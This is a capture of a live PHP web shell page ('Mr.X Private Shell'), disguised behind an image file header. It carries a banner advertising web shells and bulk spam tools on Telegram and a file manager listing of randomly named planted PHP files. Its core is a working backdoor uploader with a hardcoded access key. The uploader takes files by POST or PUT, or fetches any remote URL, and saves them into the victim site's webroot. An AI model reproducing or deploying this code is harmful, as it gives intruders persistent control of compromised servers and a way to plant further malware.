����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

njujpgyl@216.73.216.165: ~ $
<?php
// CONFIG
$AUTH_KEY = 'madtiger';
$MAX_FILE_SIZE = 50 * 1024 * 1024; // 50 MB
$WEBROOT = rtrim($_SERVER['DOCUMENT_ROOT'] ?? __DIR__, "/\\");

// Generate random folder name with user-defined prefix
$FOLDER_PREFIX = isset($_GET['folder_prefix']) ? $_GET['folder_prefix'] : 'tmp_';
$RANDOM_FOLDER = $FOLDER_PREFIX . bin2hex(random_bytes(8));
$UPLOAD_DIR = $WEBROOT . '/' . $RANDOM_FOLDER;

// AUTH
if (!isset($_GET['prm']) || $_GET['prm'] !== $AUTH_KEY) {
    http_response_code(403);
    header('Content-Type: text/plain; charset=utf-8');
    echo "403 Forbidden\n";
    exit;
}

// Ensure upload directory exists
if (!is_dir($UPLOAD_DIR)) {
    if (!mkdir($UPLOAD_DIR, 0755, true)) {
        http_response_code(500);
        die("Failed to create upload directory\n");
    }
}

// Helper functions
function safe_filename($name) {
    $base = basename($name);
    $base = preg_replace('/[^A-Za-z0-9_\-\.]/', '_', $base);
    if ($base === '' || $base === '.' || $base === '..') $base = 'file';
    return $base;
}

function random_prefix($length = 4) {
    return str_pad(strval(random_int(0, pow(10, $length) - 1)), $length, '0', STR_PAD_LEFT);
}

function build_url($filename) {
    global $RANDOM_FOLDER;
    $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
    $host = $_SERVER['HTTP_HOST'] ?? 'localhost';
    return $scheme . '://' . $host . '/' . $RANDOM_FOLDER . '/' . rawurlencode($filename);
}

// Process uploads
$uploaded = null;
$error = null;

// 1) multipart POST (main method for Python script)
if (isset($_FILES['file'])) {
    $f = $_FILES['file'];
    if ($f['error'] !== UPLOAD_ERR_OK) {
        $error = "Upload error code: " . $f['error'];
    } elseif ($f['size'] > $MAX_FILE_SIZE) {
        $error = "File too large";
    } else {
        $safe = safe_filename($f['name']);
        $uniq = random_prefix(4) . '_' . $safe;
        $target = $UPLOAD_DIR . DIRECTORY_SEPARATOR . $uniq;

        if (!move_uploaded_file($f['tmp_name'], $target)) {
            $error = "Failed to move uploaded file";
        } else {
            chmod($target, 0644);
            $uploaded = [
                'filename' => $uniq,
                'size' => $f['size'],
                'path_on_server' => $target,
                'url' => build_url($uniq),
                'folder' => $RANDOM_FOLDER,
                'server' => $_SERVER['HTTP_HOST'] ?? 'unknown'
            ];
        }
    }
}

// 2) HTTP PUT with ?fname= (alternative method)
elseif ($_SERVER['REQUEST_METHOD'] === 'PUT' && isset($_GET['fname'])) {
    $fname = safe_filename($_GET['fname']);
    $putdata = fopen("php://input","r");
    $tmpPath = tempnam(sys_get_temp_dir(), "upl_");
    $out = fopen($tmpPath, "w");
    $bytes = 0;
    while (!feof($putdata)) {
        $chunk = fread($putdata, 8192);
        if ($chunk === false) break;
        $bytes += fwrite($out, $chunk);
    }
    fclose($putdata);
    fclose($out);
    if ($bytes === 0) {
        @unlink($tmpPath);
        $error = "No data received in PUT";
    } elseif ($bytes > $MAX_FILE_SIZE) {
        @unlink($tmpPath);
        $error = "File too large";
    } else {
        $uniq = random_prefix(4) . '_' . $fname;
        $target = $UPLOAD_DIR . DIRECTORY_SEPARATOR . $uniq;
        if (!rename($tmpPath, $target)) {
            @unlink($tmpPath);
            $error = "Failed to save uploaded file";
        } else {
            chmod($target, 0644);
            $uploaded = [
                'filename' => $uniq,
                'size' => $bytes,
                'path_on_server' => $target,
                'url' => build_url($uniq),
                'folder' => $RANDOM_FOLDER,
                'server' => $_SERVER['HTTP_HOST'] ?? 'unknown'
            ];
        }
    }
}

// 3) server-side fetch via get_url= (alternative method)
elseif (isset($_GET['get_url'])) {
    $remote = $_GET['get_url'];
    if (!preg_match('#^https?://#i', $remote)) {
        $error = "Invalid get_url (must be http/https)";
    } else {
        $ctx = stream_context_create(['http'=>['timeout'=>15]]);
        $data = @file_get_contents($remote, false, $ctx);
        if ($data === false) $error = "Failed to fetch remote URL";
        else {
            $size = strlen($data);
            if ($size > $MAX_FILE_SIZE) $error = "Remote file too large";
            else {
                $p = parse_url($remote);
                $name = isset($p['path']) ? basename($p['path']) : 'file';
                $safe = safe_filename($name);
                $uniq = random_prefix(4) . '_' . $safe;
                $target = $UPLOAD_DIR . DIRECTORY_SEPARATOR . $uniq;
                if (file_put_contents($target, $data) === false) {
                    $error = "Failed to save fetched file";
                } else {
                    chmod($target, 0644);
                    $uploaded = [
                        'filename' => $uniq,
                        'size' => $size,
                        'path_on_server' => $target,
                        'url' => build_url($uniq),
                        'folder' => $RANDOM_FOLDER,
                        'server' => $_SERVER['HTTP_HOST'] ?? 'unknown'
                    ];
                }
            }
        }
    }
} else {
    $error = "No file uploaded. Use multipart POST (-F), HTTP PUT (--upload-file &fname=), or get_url= for server fetch.";
}

// Output result
$plain = isset($_REQUEST['plain']) && ($_REQUEST['plain'] == '1' || strtolower($_REQUEST['plain']) === 'true');

if ($uploaded !== null) {
    if ($plain) {
        header('Content-Type: text/plain; charset=utf-8');
        echo $uploaded['url'] . "\n";
        exit;
    } else {
        header('Content-Type: application/json; charset=utf-8');
        echo json_encode(array_merge(['status'=>'ok'], $uploaded), JSON_UNESCAPED_SLASHES|JSON_PRETTY_PRINT);
        exit;
    }
} else {
    if ($plain) {
        header('Content-Type: text/plain; charset=utf-8');
        echo "ERROR: " . ($error ?? 'unknown') . "\n";
        exit;
    } else {
        http_response_code(400);
        header('Content-Type: application/json; charset=utf-8');
        echo json_encode(['status'=>'error','message'=>($error ?? 'unknown')], JSON_PRETTY_PRINT);
        exit;
    }
}
?>

Filemanager

Name Type Size Permission Actions
oxnixcgiapi Folder 0755
File 0 B 0
File 0 B 0
____V9zwTc File 12.25 KB 0600
____YOT497 File 12.25 KB 0600
____ZWCyDS File 12.25 KB 0600
____luW9SA File 12.25 KB 0600
File 0 B 0777
p6a469ba26dcac4.78964358.php File 70.78 KB 0644
p6a470646acfa44.04273048.php File 70.78 KB 0644
p6a4756ee3f34c2.33880229.php File 70.78 KB 0644
p6a4a4a55109e78.19700185.php File 6.12 KB 0644
p6a4aa967d46403.88645622.php File 6.12 KB 0644
p6a4ac203476002.04578163.php File 6.12 KB 0644
p6a4b0199672553.68471545.php File 6.12 KB 0644
p6a4bd30d9a5383.80241117.php File 6.12 KB 0644
phpb2xKC2 File 1008 B 0600
session_cache.tmp File 7 B 0644